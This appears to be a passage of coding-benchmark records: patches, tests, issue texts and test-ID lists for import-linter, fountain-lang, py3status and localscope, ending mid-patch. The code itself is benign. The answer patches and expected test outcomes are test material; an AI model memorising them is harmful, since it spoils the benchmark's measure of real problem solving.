+ "mypackage.a -> mypackage.c",
+ "mypackage.a -> mypackage.b",
+ ],
+ },
+ )
+
+ contract_check = contract.check(graph=graph)
+
+ assert contract_check.kept
diff --git a/tests/unit/contracts/test_layers.py b/tests/unit/contracts/test_layers.py
index 36b1086..82231c4 100644
--- a/tests/unit/contracts/test_layers.py
+++ b/tests/unit/contracts/test_layers.py
@@ -765,6 +765,20 @@ class TestIgnoreImports:
with pytest.raises(MissingImport):
contract.check(graph=graph)
+ def test_ignore_imports_tolerates_duplicates(self):
+ contract = self._build_contract(
+ ignore_imports=[
+ "mypackage.low.black -> mypackage.medium.orange",
+ "mypackage.utils.foo -> mypackage.utils.bar",
+ "mypackage.low.black -> mypackage.medium.orange",
+ ]
+ )
+ graph = self._build_graph()
+
+ contract_check = contract.check(graph=graph)
+
+ assert contract_check.kept
+
def _build_graph(self):
graph = ImportGraph()
for module in (
diff --git a/tests/unit/domain/test_fields.py b/tests/unit/domain/test_fields.py
index 851404a..76883f0 100644
--- a/tests/unit/domain/test_fields.py
+++ b/tests/unit/domain/test_fields.py
@@ -7,6 +7,7 @@ from importlinter.domain.fields import (
Field,
ListField,
ModuleField,
+ SetField,
StringField,
ValidationError,
)
@@ -83,9 +84,23 @@ class TestDirectImportField(BaseFieldTest):
"raw_data, expected_value",
(
(["mypackage.foo", "mypackage.bar"], [Module("mypackage.foo"), Module("mypackage.bar")]),
+ (["mypackage.foo", "mypackage.foo"], [Module("mypackage.foo"), Module("mypackage.foo")]),
("singlevalue", [Module("singlevalue")]),
),
)
class TestListField(BaseFieldTest):
field_class = ListField
field_kwargs = dict(subfield=ModuleField())
+
+
+@pytest.mark.parametrize(
+ "raw_data, expected_value",
+ (
+ (["mypackage.foo", "mypackage.bar"], {Module("mypackage.foo"), Module("mypackage.bar")}),
+ (["mypackage.foo", "mypackage.foo"], {Module("mypackage.foo")}),
+ ("singlevalue", {Module("singlevalue")}),
+ ),
+)
+class TestSetField(BaseFieldTest):
+ field_class = SetField
+ field_kwargs = dict(subfield=ModuleField())
|
Duplicate ignored_imports lead to confusing error
If you include an ignored import twice in a contract, you get the following error (as it tries to remove it the second time):
```
The edge mypackage.foo-mypackage.bar not in graph.
```
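A minimal sketch of the behavioural difference the patch introduces (module names are made up): duplicates now collapse at parse time, before the contract ever tries to remove the same edge twice.
```python
from importlinter.domain.fields import DirectImportField, ListField, SetField

raw = [
    "mypackage.foo -> mypackage.bar",
    "mypackage.foo -> mypackage.bar",  # the accidental duplicate from a contract
]

# Old behaviour: ignore_imports was a ListField, so both entries survive and the
# second removal attempt fails with "The edge mypackage.foo-mypackage.bar not in graph."
print(ListField(subfield=DirectImportField()).parse(raw))

# New behaviour: a SetField de-duplicates while parsing, so each ignored import
# is removed from the graph exactly once.
print(SetField(subfield=DirectImportField()).parse(raw))
```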
|
0.0
|
334b4d1b85bae7f21f7678e5bda17af0e7487af2
|
[
"tests/unit/contracts/test_forbidden.py::TestForbiddenContract::test_is_kept_when_no_forbidden_modules_imported",
"tests/unit/contracts/test_forbidden.py::TestForbiddenContract::test_is_broken_when_forbidden_modules_imported",
"tests/unit/contracts/test_forbidden.py::TestForbiddenContract::test_is_broken_when_forbidden_external_modules_imported",
"tests/unit/contracts/test_forbidden.py::TestForbiddenContract::test_is_invalid_when_forbidden_externals_but_graph_does_not_include_externals",
"tests/unit/contracts/test_forbidden.py::TestForbiddenContract::test_ignore_imports_tolerates_duplicates",
"tests/unit/contracts/test_forbidden.py::test_render_broken_contract",
"tests/unit/contracts/test_independence.py::TestIndependenceContract::test_when_modules_are_independent",
"tests/unit/contracts/test_independence.py::TestIndependenceContract::test_when_root_imports_root_directly",
"tests/unit/contracts/test_independence.py::TestIndependenceContract::test_when_root_imports_root_indirectly",
"tests/unit/contracts/test_independence.py::TestIndependenceContract::test_chains_via_other_independent_modules",
"tests/unit/contracts/test_independence.py::TestIndependenceContract::test_when_child_imports_child",
"tests/unit/contracts/test_independence.py::TestIndependenceContract::test_when_grandchild_imports_root",
"tests/unit/contracts/test_independence.py::test_ignore_imports[ignore_imports0-False]",
"tests/unit/contracts/test_independence.py::test_ignore_imports[ignore_imports1-True]",
"tests/unit/contracts/test_independence.py::test_ignore_imports[ignore_imports2-True]",
"tests/unit/contracts/test_independence.py::test_render_broken_contract",
"tests/unit/contracts/test_independence.py::test_missing_module",
"tests/unit/contracts/test_independence.py::test_ignore_imports_tolerates_duplicates",
"tests/unit/contracts/test_layers.py::TestLayerContractSingleContainers::test_no_illegal_imports_means_contract_is_kept",
"tests/unit/contracts/test_layers.py::TestLayerContractSingleContainers::test_illegal_child_imports_means_contract_is_broken",
"tests/unit/contracts/test_layers.py::TestLayerContractSingleContainers::test_illegal_grandchild_to_child_means_contract_is_broken",
"tests/unit/contracts/test_layers.py::TestLayerMultipleContainers::test_no_illegal_imports_means_contract_is_kept",
"tests/unit/contracts/test_layers.py::TestLayerMultipleContainers::test_imports_from_low_to_high_but_in_different_container_doesnt_break_contract",
"tests/unit/contracts/test_layers.py::TestLayerMultipleContainers::test_illegal_grandchild_imports_means_contract_is_broken",
"tests/unit/contracts/test_layers.py::TestLayerContractPopulatesMetadata::test_layer_contract_populates_metadata",
"tests/unit/contracts/test_layers.py::TestLayerContractPopulatesMetadata::test_layer_contract_populates_extra_firsts_one_indirect",
"tests/unit/contracts/test_layers.py::TestLayerContractPopulatesMetadata::test_layer_contract_populates_extra_firsts_two_indirects",
"tests/unit/contracts/test_layers.py::TestLayerContractPopulatesMetadata::test_layer_contract_populates_extra_lasts_one_indirect",
"tests/unit/contracts/test_layers.py::TestLayerContractPopulatesMetadata::test_layer_contract_populates_extra_lasts_two_indirects",
"tests/unit/contracts/test_layers.py::TestLayerContractPopulatesMetadata::test_layer_contract_populates_firsts_and_lasts_three_indirects",
"tests/unit/contracts/test_layers.py::TestIgnoreImports::test_one_ignored_from_each_chain_means_contract_is_kept",
"tests/unit/contracts/test_layers.py::TestIgnoreImports::test_ignore_only_one_chain_should_fail_because_of_the_other",
"tests/unit/contracts/test_layers.py::TestIgnoreImports::test_multiple_ignore_from_same_chain_should_not_error",
"tests/unit/contracts/test_layers.py::TestIgnoreImports::test_ignore_from_nonexistent_importer_raises_missing_import",
"tests/unit/contracts/test_layers.py::TestIgnoreImports::test_ignore_from_nonexistent_imported_raises_missing_import",
"tests/unit/contracts/test_layers.py::TestIgnoreImports::test_ignore_imports_tolerates_duplicates",
"tests/unit/contracts/test_layers.py::test_optional_layers[True-False]",
"tests/unit/contracts/test_layers.py::test_missing_containerless_layers_raise_value_error",
"tests/unit/contracts/test_layers.py::test_render_broken_contract",
"tests/unit/contracts/test_layers.py::test_invalid_container[notingraph]",
"tests/unit/contracts/test_layers.py::test_invalid_container[notingraph.foo]",
"tests/unit/contracts/test_layers.py::test_invalid_container[notinpackage]",
"tests/unit/contracts/test_layers.py::test_invalid_container[notinpackage.foo]",
"tests/unit/contracts/test_layers.py::test_invalid_container[notinpackage.foo.one]",
"tests/unit/contracts/test_layers.py::test_invalid_container[mypackagebeginscorrectly]",
"tests/unit/contracts/test_layers.py::test_invalid_container_multiple_packages",
"tests/unit/contracts/test_layers.py::TestLayerContractNoContainer::test_no_illegal_imports_means_contract_is_kept",
"tests/unit/contracts/test_layers.py::TestLayerContractNoContainer::test_illegal_imports_means_contract_is_broken",
"tests/unit/contracts/test_layers.py::TestLayerContractNoContainer::test_no_illegal_imports_across_multiple_root_packages_means_contract_is_kept",
"tests/unit/contracts/test_layers.py::TestLayerContractNoContainer::test_illegal_imports_across_multiple_root_packages_means_contract_is_broken",
"tests/unit/contracts/test_layers.py::TestGetIndirectCollapsedChains::test_no_chains",
"tests/unit/contracts/test_layers.py::TestGetIndirectCollapsedChains::test_direct_imports_raises_value_error",
"tests/unit/contracts/test_layers.py::TestGetIndirectCollapsedChains::test_chain_length_2_is_included",
"tests/unit/contracts/test_layers.py::TestGetIndirectCollapsedChains::test_chain_length_3_is_included",
"tests/unit/contracts/test_layers.py::TestGetIndirectCollapsedChains::test_multiple_chains_of_length_2_same_segment",
"tests/unit/contracts/test_layers.py::TestGetIndirectCollapsedChains::test_multiple_chains_of_length_3_same_segment",
"tests/unit/contracts/test_layers.py::TestPopDirectImports::test_direct_import_between_descendants",
"tests/unit/contracts/test_layers.py::TestPopDirectImports::test_direct_import_between_roots",
"tests/unit/contracts/test_layers.py::TestPopDirectImports::test_direct_import_root_to_descendant",
"tests/unit/contracts/test_layers.py::TestPopDirectImports::test_direct_import_descendant_to_root",
"tests/unit/domain/test_fields.py::TestStringField::test_field[Hello,",
"tests/unit/domain/test_fields.py::TestStringField::test_field[raw_data1-expected_value1]",
"tests/unit/domain/test_fields.py::TestModuleField::test_field[mypackage.foo.bar-expected_value0]",
"tests/unit/domain/test_fields.py::TestModuleField::test_field[raw_data1-expected_value1]",
"tests/unit/domain/test_fields.py::TestDirectImportField::test_field[mypackage.foo",
"tests/unit/domain/test_fields.py::TestDirectImportField::test_field[raw_data1-expected_value1]",
"tests/unit/domain/test_fields.py::TestListField::test_field[raw_data0-expected_value0]",
"tests/unit/domain/test_fields.py::TestListField::test_field[raw_data1-expected_value1]",
"tests/unit/domain/test_fields.py::TestListField::test_field[singlevalue-expected_value2]",
"tests/unit/domain/test_fields.py::TestSetField::test_field[raw_data0-expected_value0]",
"tests/unit/domain/test_fields.py::TestSetField::test_field[raw_data1-expected_value1]",
"tests/unit/domain/test_fields.py::TestSetField::test_field[singlevalue-expected_value2]"
] |
[] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_many_modified_files",
"has_many_hunks",
"has_pytest_match_arg"
],
"has_test_patch": true,
"is_lite": false
}
|
2020-07-26 10:23:27+00:00
|
bsd-2-clause
| 5,460
|
|
florimondmanca__fountain-lang-7
|
diff --git a/src/fountain/_ast/visitor.py b/src/fountain/_ast/visitor.py
index 12308b0..7859e02 100644
--- a/src/fountain/_ast/visitor.py
+++ b/src/fountain/_ast/visitor.py
@@ -1,4 +1,4 @@
-from typing import Generic, TypeVar
+from typing import Any, Generic, TypeVar
from .nodes import Expr, Stmt
@@ -12,11 +12,11 @@ class NodeVisitor(Generic[R]):
)
return method(node)
- def execute(self, node: Stmt) -> None:
+ def execute(self, node: Stmt) -> Any:
method = getattr(
self, f"execute_{node.__class__.__name__}", self.execute_default
)
- method(node)
+ return method(node)
def evaluate_default(self, expr: Expr) -> R:
raise NotImplementedError(f"Unexpected node: {expr}") # pragma: no cover
diff --git a/src/fountain/_cli.py b/src/fountain/_cli.py
index 2f258fc..45778de 100644
--- a/src/fountain/_cli.py
+++ b/src/fountain/_cli.py
@@ -1,10 +1,11 @@
import argparse
import pathlib
import sys
+from typing import Any
from ._ast import parse, tokenize
from ._exceptions import EvalError, ParseError, TokenizeError
-from ._interpreter import Interpreter
+from ._interpreter import Interpreter, stringify
def main() -> None:
@@ -32,28 +33,27 @@ class CLI:
else:
return self._run_prompt()
+ def evaluate(self, source: str) -> Any:
+ tokens = tokenize(source)
+ statements = parse(tokens)
+ return self._interpreter.interpret(statements)
+
def run(self, source: str) -> int:
try:
- tokens = tokenize(source)
+ self.evaluate(source)
except TokenizeError as exc:
self._report(exc.message, lineno=exc.lineno)
return 65
-
- try:
- statements = parse(tokens)
except ParseError as exc:
where = "at end" if exc.at_eof else f"at {exc.token.lexeme!r}"
self._report(exc.message, lineno=exc.token.lineno, where=where)
return 65
-
- try:
- self._interpreter.interpret(statements)
except EvalError as exc:
where = f"at {exc.token.lexeme!r}"
self._report(exc.message, lineno=exc.token.lineno, where=where)
return 70
-
- return 0
+ else:
+ return 0
def _run_file(self, path: str) -> int:
try:
@@ -78,7 +78,9 @@ class CLI:
if not line:
break
- _ = self.run(line)
+ value = self.evaluate(line)
+ if value is not None:
+ print(stringify(value))
return 0
diff --git a/src/fountain/_interpreter.py b/src/fountain/_interpreter.py
index 566e332..112f810 100644
--- a/src/fountain/_interpreter.py
+++ b/src/fountain/_interpreter.py
@@ -40,21 +40,23 @@ class Interpreter(NodeVisitor[Any]):
scope.assign(name, value)
self._scope = scope
- def interpret(self, statements: list[Stmt]) -> None:
+ def interpret(self, statements: list[Stmt]) -> Any:
+ value: Any = None
try:
for stmt in statements:
- self.execute(stmt)
+ value = self.execute(stmt)
except EvalError:
raise
+ else:
+ return value
def execute_Assign(self, stmt: Assign) -> None:
name = stmt.target.lexeme
value = self.evaluate(stmt.value)
self._scope.assign(name, value)
- def execute_Expression(self, stmt: Expression) -> None:
- value = self.evaluate(stmt.expression)
- print(stringify(value))
+ def execute_Expression(self, stmt: Expression) -> Any:
+ return self.evaluate(stmt.expression)
def execute_Print(self, stmt: Print) -> None:
value = self.evaluate(stmt.expression)
|
florimondmanca/fountain-lang
|
4ca44d301117e2bd738aa98411d6eab7bb381b26
|
diff --git a/tests/test_cli.py b/tests/test_cli.py
index b8a3bef..434a4fa 100644
--- a/tests/test_cli.py
+++ b/tests/test_cli.py
@@ -117,9 +117,7 @@ def test_cli_repl(monkeypatch: Any, capsys: Any) -> None:
),
(
"fn f() print 'OK' end; f()",
- # TODO: drop 'nil' after:
- # https://github.com/florimondmanca/fountain-lang/issues/1
- "OK\nnil\n",
+ "OK\n",
),
(
"""
|
Handling of expression statements results in unwanted prints
Currently, expression statements such as:
```lua
"hello, world"
some_func(a, b, c)
```
Result in printing the result to the console. In the REPL or via `fountain -c` this is what we want, but not when running from a file.
We should move the "print the expression" behaviour out of the `Interpreter` and into the `CLI` (see the sketch after this list). Most likely:
* Modify `Interpreter.execute()` to fit `() -> Any` (may return a value).
* Modify `Interpreter.execute_Expression()` so that it _returns_ the value of the expression.
* Modify `interpret` to be `(list[Stmt]) -> Any` so that it keeps track of the statement return values (in practice only `Expression` statements may return a value), and return the last one.
* Add a new `CLI.evaluate(source: str) -> Any` method that returns the result from `interpret()`.
* Update `CLI.run`, `CLI._run_file` and `CLI._run_prompt` so that they do the right thing, i.e. only show `stringify(value)` in the prompt.
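A condensed sketch of the resulting prompt flow, using the names from the list above; `run_prompt` is a stand-in for the real `CLI._run_prompt` loop, and the prompt string is hypothetical:
```python
from fountain._interpreter import stringify

def run_prompt(cli):
    while True:
        line = input("> ")
        if not line:
            break
        # Interpreter.interpret() now returns the value of the last expression
        # statement (or None), and only the REPL decides whether to print it.
        value = cli.evaluate(line)
        if value is not None:
            print(stringify(value))
```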
|
0.0
|
4ca44d301117e2bd738aa98411d6eab7bb381b26
|
[
"tests/test_cli.py::test_cli_eval[fn"
] |
[
"tests/test_cli.py::test_cli_repl",
"tests/test_cli.py::test_cli_eval[print",
"tests/test_cli.py::test_cli_eval[x",
"tests/test_cli.py::test_cli_eval[\\n",
"tests/test_cli.py::test_cli_eval[do",
"tests/test_cli.py::test_cli_eval[assert",
"tests/test_cli.py::test_cli_eval[--",
"tests/test_cli.py::test_cli_eval[-]",
"tests/test_cli.py::test_cli_eval_error[(3",
"tests/test_cli.py::test_cli_eval_error['hello-[line",
"tests/test_cli.py::test_cli_eval_error['hello\"-[line",
"tests/test_cli.py::test_cli_eval_error['hello\\n-[line",
"tests/test_cli.py::test_cli_eval_error[3",
"tests/test_cli.py::test_cli_eval_error[\\n",
"tests/test_cli.py::test_cli_eval_error[do",
"tests/test_cli.py::test_cli_eval_error[break-[line",
"tests/test_cli.py::test_cli_eval_error[continue-[line",
"tests/test_cli.py::test_cli_eval_error[fn",
"tests/test_cli.py::test_cli_eval_error[return",
"tests/test_cli.py::test_cli_eval_error[1/0-[line",
"tests/test_cli.py::test_cli_eval_error[1",
"tests/test_cli.py::test_cli_eval_error['hello'",
"tests/test_cli.py::test_cli_eval_error[print",
"tests/test_cli.py::test_cli_eval_error[assert",
"tests/test_cli.py::test_cli_eval_error[1()-[line"
] |
{
"failed_lite_validators": [
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2021-10-02 13:59:15+00:00
|
apache-2.0
| 2,356
|
|
ultrabug__py3status-1221
|
diff --git a/py3status/formatter.py b/py3status/formatter.py
index e265819e..db2875de 100644
--- a/py3status/formatter.py
+++ b/py3status/formatter.py
@@ -268,7 +268,9 @@ class Placeholder:
output = u'{%s%s}' % (self.key, self.format)
value = value_ = output.format(**{self.key: value})
- if block.commands.not_zero:
+ if block.parent is None:
+ valid = True
+ elif block.commands.not_zero:
valid = value_ not in ['', 'None', None, False, '0', '0.0', 0, 0.0]
else:
# '', None, and False are ignored
|
ultrabug/py3status
|
dcd3dda64b82e536cfd0233691d374a22e96aeac
|
diff --git a/tests/test_formatter.py b/tests/test_formatter.py
index 0d1bf9b5..76febab4 100644
--- a/tests/test_formatter.py
+++ b/tests/test_formatter.py
@@ -296,10 +296,18 @@ def test_26():
def test_27():
- run_formatter({'format': '{None}', 'expected': '', })
+ run_formatter({'format': '{None}', 'expected': 'None', })
def test_27a():
+ run_formatter({'format': '{None} {no}', 'expected': 'None False', })
+
+
+def test_27b():
+ run_formatter({'format': '[Hello {None}] {no}', 'expected': ' False', })
+
+
+def test_27c():
run_formatter({'format': '[Hi, my name is {None_str}]', 'expected': '', })
@@ -312,7 +320,7 @@ def test_29():
def test_30():
- run_formatter({'format': '{no}', 'expected': '', })
+ run_formatter({'format': '{no}', 'expected': 'False', })
def test_31():
@@ -1134,7 +1142,7 @@ def test_module_true_value():
def test_module_false_value():
- run_formatter({'format': '{module_false}', 'expected': ''})
+ run_formatter({'format': '{module_false}', 'expected': 'False'})
def test_zero_format_1():
|
Formatting returns empty when closing with a False or None placeholder
Formatting returns empty when closing with a `False` or `None` placeholder.
```diff
diff --git a/py3status/modules/static_string.py b/py3status/modules/static_string.py
index dbcec8c6..593b3740 100644
--- a/py3status/modules/static_string.py
+++ b/py3status/modules/static_string.py
@@ -18,10 +18,17 @@ class Py3status:
# available configuration parameters
format = 'Hello, world!'
+ # format = 'A, B, C // {true}' # IS OK | A, B, C // True
+ # format = 'A, B, C // {false}' # IS NOT OK |
+ # format = 'A, B, C // {none}' # IS NOT OK |
+ # format = 'A, B, C // {false} ' # IS OK | A, B, C // False
+ # format = 'A, B, C // {none} ' # IS OK | A, B, C // None
+
def static_string(self):
+ new_dict = {'true': True, 'false': False, 'none': None}
return {
'cached_until': self.py3.CACHE_FOREVER,
- 'full_text': self.py3.safe_format(self.format),
+ 'full_text': self.py3.safe_format(self.format, new_dict),
}
```
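In terms of the same `safe_format` calls, the behaviour after the fix should look like the sketch below (wrapped in a function so nothing runs at import time; `py3` is the helper injected into a module, as in the snippet above, and the rendered values mirror the updated formatter tests):
```python
def expected_after_fix(py3):
    data = {"true": True, "false": False, "none": None}
    # A falsy placeholder at top level now always renders its value:
    py3.safe_format("A, B, C // {false}", data)            # renders "A, B, C // False"
    py3.safe_format("A, B, C // {none}", data)             # renders "A, B, C // None"
    # Inside an [optional] block the old collapsing behaviour is kept:
    py3.safe_format("[A, B, C // {none}] {false}", data)   # renders " False"
```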
|
0.0
|
dcd3dda64b82e536cfd0233691d374a22e96aeac
|
[
"tests/test_formatter.py::test_27",
"tests/test_formatter.py::test_27a",
"tests/test_formatter.py::test_27b",
"tests/test_formatter.py::test_30",
"tests/test_formatter.py::test_module_false_value"
] |
[
"tests/test_formatter.py::test_1",
"tests/test_formatter.py::test_2",
"tests/test_formatter.py::test_3",
"tests/test_formatter.py::test_4",
"tests/test_formatter.py::test_5",
"tests/test_formatter.py::test_6",
"tests/test_formatter.py::test_7",
"tests/test_formatter.py::test_8",
"tests/test_formatter.py::test_9",
"tests/test_formatter.py::test_10",
"tests/test_formatter.py::test_11",
"tests/test_formatter.py::test_12",
"tests/test_formatter.py::test_13",
"tests/test_formatter.py::test_14",
"tests/test_formatter.py::test_15",
"tests/test_formatter.py::test_16",
"tests/test_formatter.py::test_16a",
"tests/test_formatter.py::test_16b",
"tests/test_formatter.py::test_17",
"tests/test_formatter.py::test_18",
"tests/test_formatter.py::test_19",
"tests/test_formatter.py::test_20",
"tests/test_formatter.py::test_21",
"tests/test_formatter.py::test_22",
"tests/test_formatter.py::test_23",
"tests/test_formatter.py::test_24",
"tests/test_formatter.py::test_24a",
"tests/test_formatter.py::test_24b",
"tests/test_formatter.py::test_25",
"tests/test_formatter.py::test_26",
"tests/test_formatter.py::test_27c",
"tests/test_formatter.py::test_28",
"tests/test_formatter.py::test_29",
"tests/test_formatter.py::test_31",
"tests/test_formatter.py::test_32",
"tests/test_formatter.py::test_33",
"tests/test_formatter.py::test_34",
"tests/test_formatter.py::test_35",
"tests/test_formatter.py::test_36",
"tests/test_formatter.py::test_37",
"tests/test_formatter.py::test_38",
"tests/test_formatter.py::test_39",
"tests/test_formatter.py::test_40",
"tests/test_formatter.py::test_41",
"tests/test_formatter.py::test_42",
"tests/test_formatter.py::test_43",
"tests/test_formatter.py::test_44",
"tests/test_formatter.py::test_45",
"tests/test_formatter.py::test_46",
"tests/test_formatter.py::test_47",
"tests/test_formatter.py::test_48",
"tests/test_formatter.py::test_49",
"tests/test_formatter.py::test_50",
"tests/test_formatter.py::test_51",
"tests/test_formatter.py::test_52",
"tests/test_formatter.py::test_53",
"tests/test_formatter.py::test_54",
"tests/test_formatter.py::test_55",
"tests/test_formatter.py::test_56",
"tests/test_formatter.py::test_57",
"tests/test_formatter.py::test_58",
"tests/test_formatter.py::test_58a",
"tests/test_formatter.py::test_59",
"tests/test_formatter.py::test_59a",
"tests/test_formatter.py::test_60",
"tests/test_formatter.py::test_61",
"tests/test_formatter.py::test_62",
"tests/test_formatter.py::test_63",
"tests/test_formatter.py::test_64",
"tests/test_formatter.py::test_65",
"tests/test_formatter.py::test_66",
"tests/test_formatter.py::test_67",
"tests/test_formatter.py::test_68",
"tests/test_formatter.py::test_69",
"tests/test_formatter.py::test_70",
"tests/test_formatter.py::test_70a",
"tests/test_formatter.py::test_71",
"tests/test_formatter.py::test_72",
"tests/test_formatter.py::test_73",
"tests/test_formatter.py::test_74",
"tests/test_formatter.py::test_75",
"tests/test_formatter.py::test_76",
"tests/test_formatter.py::test_77",
"tests/test_formatter.py::test_78",
"tests/test_formatter.py::test_else_true",
"tests/test_formatter.py::test_else_false",
"tests/test_formatter.py::test_color_name_1",
"tests/test_formatter.py::test_color_name_2",
"tests/test_formatter.py::test_color_name_3",
"tests/test_formatter.py::test_color_name_4",
"tests/test_formatter.py::test_color_name_4a",
"tests/test_formatter.py::test_color_name_5",
"tests/test_formatter.py::test_color_name_5a",
"tests/test_formatter.py::test_color_name_6",
"tests/test_formatter.py::test_color_name_7",
"tests/test_formatter.py::test_color_name_7a",
"tests/test_formatter.py::test_color_1",
"tests/test_formatter.py::test_color_1a",
"tests/test_formatter.py::test_color_2",
"tests/test_formatter.py::test_color_3",
"tests/test_formatter.py::test_color_4",
"tests/test_formatter.py::test_color_5",
"tests/test_formatter.py::test_color_6",
"tests/test_formatter.py::test_color_7",
"tests/test_formatter.py::test_color_7a",
"tests/test_formatter.py::test_color_8",
"tests/test_formatter.py::test_color_8a",
"tests/test_formatter.py::test_color_9",
"tests/test_formatter.py::test_color_9a",
"tests/test_formatter.py::test_composite_1",
"tests/test_formatter.py::test_composite_2",
"tests/test_formatter.py::test_composite_3",
"tests/test_formatter.py::test_composite_4",
"tests/test_formatter.py::test_composite_5",
"tests/test_formatter.py::test_composite_6",
"tests/test_formatter.py::test_attr_getter",
"tests/test_formatter.py::test_min_length_1",
"tests/test_formatter.py::test_min_length_2",
"tests/test_formatter.py::test_min_length_3",
"tests/test_formatter.py::test_min_length_4",
"tests/test_formatter.py::test_min_length_5",
"tests/test_formatter.py::test_min_length_6",
"tests/test_formatter.py::test_numeric_strings_1",
"tests/test_formatter.py::test_numeric_strings_2",
"tests/test_formatter.py::test_numeric_strings_3",
"tests/test_formatter.py::test_numeric_strings_4",
"tests/test_formatter.py::test_numeric_strings_5",
"tests/test_formatter.py::test_numeric_strings_6",
"tests/test_formatter.py::test_not_zero_1",
"tests/test_formatter.py::test_not_zero_2",
"tests/test_formatter.py::test_not_zero_3",
"tests/test_formatter.py::test_not_zero_4",
"tests/test_formatter.py::test_not_zero_5",
"tests/test_formatter.py::test_not_zero_6",
"tests/test_formatter.py::test_not_zero_7",
"tests/test_formatter.py::test_not_zero_8",
"tests/test_formatter.py::test_not_zero_9",
"tests/test_formatter.py::test_not_zero_10",
"tests/test_formatter.py::test_not_zero_11",
"tests/test_formatter.py::test_bad_composite_color",
"tests/test_formatter.py::test_soft_1",
"tests/test_formatter.py::test_soft_2",
"tests/test_formatter.py::test_soft_3",
"tests/test_formatter.py::test_soft_4",
"tests/test_formatter.py::test_soft_5",
"tests/test_formatter.py::test_soft_6",
"tests/test_formatter.py::test_soft_7",
"tests/test_formatter.py::test_module_true",
"tests/test_formatter.py::test_module_false",
"tests/test_formatter.py::test_module_true_value",
"tests/test_formatter.py::test_zero_format_1",
"tests/test_formatter.py::test_zero_format_2",
"tests/test_formatter.py::test_zero_format_3",
"tests/test_formatter.py::test_zero_format_4",
"tests/test_formatter.py::test_inherit_not_zero_1",
"tests/test_formatter.py::test_inherit_not_zero_2",
"tests/test_formatter.py::test_inherit_not_zero_3",
"tests/test_formatter.py::test_inherit_show_1",
"tests/test_formatter.py::test_inherit_color_1",
"tests/test_formatter.py::test_inherit_color_2",
"tests/test_formatter.py::test_conditions_1",
"tests/test_formatter.py::test_conditions_2",
"tests/test_formatter.py::test_conditions_3",
"tests/test_formatter.py::test_conditions_4",
"tests/test_formatter.py::test_conditions_5",
"tests/test_formatter.py::test_conditions_6",
"tests/test_formatter.py::test_conditions_7",
"tests/test_formatter.py::test_conditions_8",
"tests/test_formatter.py::test_conditions_9",
"tests/test_formatter.py::test_conditions_10",
"tests/test_formatter.py::test_conditions_11",
"tests/test_formatter.py::test_conditions_12",
"tests/test_formatter.py::test_conditions_13",
"tests/test_formatter.py::test_conditions_14",
"tests/test_formatter.py::test_conditions_15",
"tests/test_formatter.py::test_conditions_16",
"tests/test_formatter.py::test_conditions_17",
"tests/test_formatter.py::test_conditions_18",
"tests/test_formatter.py::test_conditions_19",
"tests/test_formatter.py::test_conditions_20",
"tests/test_formatter.py::test_conditions_21",
"tests/test_formatter.py::test_conditions_22",
"tests/test_formatter.py::test_conditions_23",
"tests/test_formatter.py::test_trailing_zeroes_1",
"tests/test_formatter.py::test_trailing_zeroes_2",
"tests/test_formatter.py::test_ceiling_numbers_1",
"tests/test_formatter.py::test_ceiling_numbers_2"
] |
{
"failed_lite_validators": [],
"has_test_patch": true,
"is_lite": true
}
|
2018-01-10 08:09:08+00:00
|
bsd-3-clause
| 6,156
|
|
tillahoffmann__localscope-10
|
diff --git a/README.rst b/README.rst
index fee5d6c..b976dbc 100644
--- a/README.rst
+++ b/README.rst
@@ -20,7 +20,7 @@ Interactive python sessions, such as `Jupyter notebooks <https://jupyter.org/>`_
... print(a)
Traceback (most recent call last):
...
- ValueError: `a` is not a permitted global
+ localscope.LocalscopeException: `a` is not a permitted global (file "...", line 1, in print_a)
Motivation and detailed example
-------------------------------
@@ -65,7 +65,7 @@ This example may seem contrived. But unintended information leakage from the glo
... return sum(((x - y) / sigma) ** 2 for x, y in zip(xs, ys))
Traceback (most recent call last):
...
- ValueError: `sigma` is not a permitted global
+ localscope.LocalscopeException: `sigma` is not a permitted global (file "...", line 3, in <genexpr>)
Interface
---------
diff --git a/localscope/__init__.py b/localscope/__init__.py
index ff876da..bec61c5 100644
--- a/localscope/__init__.py
+++ b/localscope/__init__.py
@@ -16,7 +16,6 @@ def localscope(
predicate: Optional[Callable] = None,
allowed: Optional[Set[str]] = None,
allow_closure: bool = False,
- _globals: Optional[Dict[str, Any]] = None,
):
"""
Restrict the scope of a callable to local variables to avoid unintentional
@@ -27,8 +26,6 @@ def localscope(
predicate : Predicate to determine whether a global variable is allowed in the
scope. Defaults to allow any module.
allowed: Names of globals that are allowed to enter the scope.
- _globals : Globals associated with the root callable which are passed to
- dependent code blocks for analysis.
Attributes:
mfc: Decorator allowing *m*\\ odules, *f*\\ unctions, and *c*\\ lasses to enter
@@ -44,7 +41,8 @@ def localscope(
... print(a)
Traceback (most recent call last):
...
- ValueError: `a` is not a permitted global
+ localscope.LocalscopeException: `a` is not a permitted global (file "...",
+ line 1, in print_a)
The scope of a function can be extended by providing a list of allowed
exceptions.
@@ -85,53 +83,111 @@ def localscope(
blocks) at the time of declaration because static analysis has a minimal impact
on performance and it is easier to implement.
"""
- # Set defaults
- predicate = predicate or inspect.ismodule
+ # Set defaults and construct partial if the callable has not yet been provided for
+ # parameterized decorators, e.g., @localscope(allowed={"foo", "bar"}). This is a
+ # thin wrapper around the actual implementation `_localscope`. The wrapper
+ # reconstructs an informative traceback.
allowed = set(allowed) if allowed else set()
- if func is None:
+ predicate = predicate or inspect.ismodule
+ if not func:
return ft.partial(
localscope,
allow_closure=allow_closure,
- predicate=predicate,
allowed=allowed,
+ predicate=predicate,
)
+ return _localscope(
+ func,
+ allow_closure=allow_closure,
+ allowed=allowed,
+ predicate=predicate,
+ _globals={},
+ )
+
+
+class LocalscopeException(RuntimeError):
+ """
+ Raised when a callable tries to access a non-local variable.
+ """
+
+ def __init__(
+ self,
+ message: str,
+ code: types.CodeType,
+ instruction: Optional[dis.Instruction] = None,
+ ) -> None:
+ if instruction and instruction.starts_line:
+ lineno = instruction.starts_line
+ else:
+ lineno = code.co_firstlineno
+ details = f'file "{code.co_filename}", line {lineno}, in {code.co_name}'
+ super().__init__(f"{message} ({details})")
+
+
+def _localscope(
+ func: Union[types.FunctionType, types.CodeType],
+ *,
+ predicate: Callable,
+ allowed: Set[str],
+ allow_closure: bool,
+ _globals: Dict[str, Any],
+):
+ """
+ Args:
+ ...: Same as for the wrapper :func:`localscope`.
+ _globals : Globals associated with the root callable which are passed to
+ dependent code blocks for analysis.
+ """
+
